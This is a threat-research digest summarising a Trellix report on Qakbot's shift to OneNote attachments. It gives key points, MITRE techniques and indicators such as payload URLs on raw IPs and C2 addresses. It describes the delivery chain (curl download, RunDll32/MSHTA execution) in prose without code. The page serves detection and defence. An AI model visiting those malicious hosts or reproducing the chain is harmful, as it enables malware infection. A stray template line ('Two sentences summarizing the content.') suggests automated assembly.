Threat Research

Qakbot Evolves to OneNote Malware Distribution

Securonix

Two sentences summarizing the content. Trellix researchers document Qakbot’s evolution to OneNote-based malware distribution, showing how OneNote attachments deliver a loader DLL and the main Qakbot payload across multiple campaigns. The report also covers how threat actors use OneNote for distributing other malware (AsyncRAT, Icedid, XWorm) and provides detection and prevention guidance. #Qakbot #OneNote #AsyncRAT #Icedid #XWorm #TA570 #TA577 #Office365 #ProLock #Egregor #DoppelPaymer

Keypoints

  • Qakbot (Pinkslipbot) has evolved to use Microsoft OneNote documents as a new malware distribution vector, with multiple campaigns observed since January 2023.
  • OneNote-based campaigns deliver a loader DLL which unpacks and loads the main Qakbot payload, enabling C2 communication and data exfiltration.
  • Attack vectors include URL-embedded downloads and malicious OneNote attachments; OneNote CTAs trigger embedded payloads after user interaction.
  • First-stage OneNote documents contain CMD and base64-decoded commands that download remote payloads via PowerShell or curl and run them through RunDll32/MSHTA.
  • Second-stage loaders (e.g., libKF5ItemViews.dll) use obfuscation and anti-analysis techniques, with shellcode that decrypts and loads the main Qakbot DLL in memory.
  • Qakbot uses persistence (scheduled tasks or Run keys) and process injection (often via hollowing into system processes) to maintain presence and perform discovery.
  • Encrypted C2 configuration and IP lists are stored in DLL resources and decrypted with RC4 using sample-specific keys; campaigns include many proxy and direct C2 addresses.

MITRE Techniques

  • [T1566.001] Spearphishing Attachment – Lured user to open malicious OneNote attachment.
    Quoted: “Phishing: Spearphishing Attachment (T1566.001)”
  • [T1204.002] User Execution – Malicious File – User opened malicious OneNote file attachment.
    Quoted: “User opened malicious OneNote file attachment.”
  • [T1204.001] User Execution – Malicious Link – User clicks on malicious link included in the OneNote file.
    Quoted: “User clicks on malicious link included in the OneNote file”
  • [T1218.005] System Binary Proxy Execution: MSHTA – OneNote spawns MSHTA to execute embedded .HTA file.
    Quoted: “OneNote spawns MSHTA to execute embedded .HTA file.”
  • [T1105] Ingress Tool Transfer – MSHTA spawns cURL to download 2nd stage payload.
    Quoted: “MSHTA spawns cURL to download 2nd stage payload.”
  • [T1218.011] System Binary Proxy Execution: RunDll32 – It spawns RunDll32 to execute 2nd stage payload.
    Quoted: “spawns RunDll32 to execute 2nd stage payload.”
  • [T1055.012] Process Hollowing – RunDll32 (Qbot) injects into a Windows System Process (e.g., wermgr.exe).
    Quoted: “Process Hollowing (T1055.012)”
  • [T1082] System Information Discovery – Core collects OS version, user, computer, domain, etc.
    Quoted: “System information collection: In addition to general system information such as OS version, username, computer name, domain, screen resolution, system time, system uptime and bot uptime.”
  • [T1047] Windows Management Instrumentation – Discovery via WMI queries after process injection.
    Quoted: “WMI queries are collected.”
  • [T1518.001] Security Software Discovery – Checks for antivirus/EDR processes.
    Quoted: “Security Software Discovery (T1518.001)”
  • [T1059.003] Windows Command Shell – Discovery commands run via CMD (net view, arp, ipconfig, etc.).
    Quoted: “Injected Windows System Process (e.g., wermgr.exe) executes discovery commands via CMD.”
  • [T1071.001] Application Layer Protocol: Web Protocols – C2 communication over web protocols.
    Quoted: “Application Layer Protocol: Web Protocols (T1071.001)”
  • [T1027] Obfuscated/Compressed Files and Information – String obfuscation and encrypted strings in the binary.
    Quoted: “Most of the significant string values in the malware binary have been encrypted…”
  • [T1140] Deobfuscate/Decode Files or Information – Decryption routines recover strings and configuration.
    Quoted: “decrypted using static extraction… The following sections will present key features…”
  • [T1547.001] Registry Run Keys / Startup Folder – Boot or Logon Autostart Execution via registry keys.
    Quoted: “Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder (T1547.001)”

Indicators of Compromise

  • [URL] – remote payload download URLs – http://216.120.201.100/60852.dat, http://185.104.195.9/87084.dat
  • [MD5] – sample OneNote and loader – 83feba178d0097929e6efeb27719d5db, 891c7d5050fe852a032eeda9311498e8
  • [SHA-256] – staged components – 033ca3aa775a34a7a4b6533b0fb744c9c71ab6cebec7e3f17a261e8f4edcdd01, e16e0faae0e9851a782d026f6692e34a9c7bae14c545aa8ac1e1ef033dfd06a8
  • [MD5] – second-stage loader – 891c7d5050fe852a032eeda9311498e8 (listed above)
  • [File name] – OneNote sample – Funds_834333.one
  • [IP] – Qakbot C2 addresses – 75.143.236.149:443, 47.34.30.133:443
  • [Domain] – OneNote campaign domains – xxxprofxxx.dnsdojo.com:5126, xxxsthebagsxxx.mywire.org:6606
  • [URL] – additional C2 or data URLs – http://216.120.201.100/60852.dat, http://185.104.195.9/87084.dat (see above)
  • [File name] – Other IoCs referenced – Funds_834333.one (see above)

Read more: https://www.trellix.com/en-us/about/newsroom/stories/research/qakbot-evolves-to-onenote-malware-distribution.html

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint